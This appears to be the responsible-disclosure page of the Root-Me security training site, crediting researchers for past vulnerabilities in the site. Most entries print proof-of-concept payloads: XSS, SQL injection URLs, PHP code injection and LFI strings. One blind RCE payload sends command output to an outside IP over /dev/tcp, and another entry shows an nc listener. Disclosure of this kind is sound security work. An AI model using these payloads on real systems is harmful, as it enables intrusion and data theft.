Discovered Weaknesses

As on any information system, some weaknesses were identified on the website.

07/02/2024 Nishacid

Has identified a stored XSS vulnerability in translations, allowing a member of the association to modify any of the site’s translations with JavaScript code by using:

<img src=xx onerror=confirm(document.domain)>

22/11/2023 Laluka

Has identified a stored XSS (through file upload) to RCE via code injection on the mediabox configuration. PHP code is reflected (json_dump) and then evaluated; the targeted account must be webmestre.

const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
const formData = new FormData(form);
formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);

14/07/2023 Elweth

Detected a vulnerability in the version of Chrome Headless that bots use for Web-Client challenges. The version in question was vulnerable to CVE-2021-21224, which could lead to code execution in the bot’s environment.

27/08/2022 Laluka

Has identified a vulnerability where changing the status of the site’s content (doc, challenge, post, ...) to a higher level (e.g. from draft to evaluation or from trash to writing) triggers an email to be sent to the challenge author and/or webmaster. Some variables, such as the title and content, are not properly encoded or escaped before being passed to the eval function which renders the email. This allowed a blind RCE with a payload such as <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?> placed in the title or content of the article.

send(eval($email));

21/07/2022 Abyss Watcher & SpawnZii

have identified a remote code execution (RCE) vulnerability allowing a privileged user to execute PHP code:

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>

11/07/2022 Abyss Watcher

identified a stored XSS vulnerability exploitable with an iframe hosted on the RM domain:

<iframe src="https://www.root-me.org/IMG/html/xss.html">

17/03/2022 Mizu

identified a stored XSS vulnerability exploitable with an iframe hosted on a malicious domain whose name starts with www.root-me.org:

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

identified a vulnerability allowing a member of the association to elevate their role to administrator simply by using the private interface of SPIP.

01/10/2021 Podalirius

identified a vulnerability allowing unrestricted access to documents attached to solutions:

<imgXX>

15/05/2020 Laluka

identified multiple vulnerabilities: 3 reflected XSS, 2 SQLi and 1 RCE:

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

identified an XSS vulnerability in the name of the file imported on http://repository.root-me.org/.

04/06/2019 warlock

identified an XSS vulnerability. This one required user interaction on the chatbox (a click on the previous page):

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 warlock

has identified a vulnerability allowing an unprivileged user to kill the database on the challenge01 server, which hosts several challenges, by saturating memory in a particular way so as to kill the process of their choice. This allowed another binary to be started in its place, listening on the same port, via a race condition.

16/11/2018 Hacqueen

identified a vulnerability allowing the store’s users to be trapped through an iframe pointing to a Spreadshirt domain controlled by the attacker (e.g. spreadshirt.ro); the lang parameter was not filtered correctly.

12/04/2018 DrStache & urandom

identified a stored XSS vulnerability in the OSM map of the CTFATD rooms by injecting the following payload into the user’s bio (https://www.root-me.org/?page=preferences&lang=en):

<svg onload=console.log(document.domain)>

12/10/2015 ST4HLKR1EG

has identified an "Insecure Direct Object Reference" vulnerability allowing any private message to be read:

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]

03/2015 WtF

has identified a remote code execution (RCE) vulnerability in a challenge being evaluated on the production server, allowing them to access the file system over SSH and to execute commands.

03/2015 WtF

has identified an arbitrary file inclusion vulnerability (LFI) in the Path Truncation web-server challenge that allowed them to read files from other challenges.

15/06/2013 LouTerrailloune

has identified a PHP code injection vulnerability on the "code - decode" page:

Text to decode in base64:

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 jimee

found several stored XSS vulnerabilities in user profile management:

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

found an LFI in a challenge:

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

found a reflected XSS in the "encode - decode" page:

Text to decode in base64:

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

found an insecure direct object reference which led to unauthorized access to all PMs:

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

11/07/2011 Armel

found a stored XSS on the chatbox:

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

found a PHP code injection vulnerability in the "online tools: nmap" page.

Host to scan in -sV mode:

--version-trace -p8888 [IP server attacker]

Service listening on the attacker’s server:

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

found a CSRF on the chatbox:

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

15/02/2011 EsSandre

found an LFI:

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

found several stored XSS vulnerabilities in the PM system:

<script>[code javascript/vbscript]</script>

02/12/2009 real

found a code injection vulnerability:

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'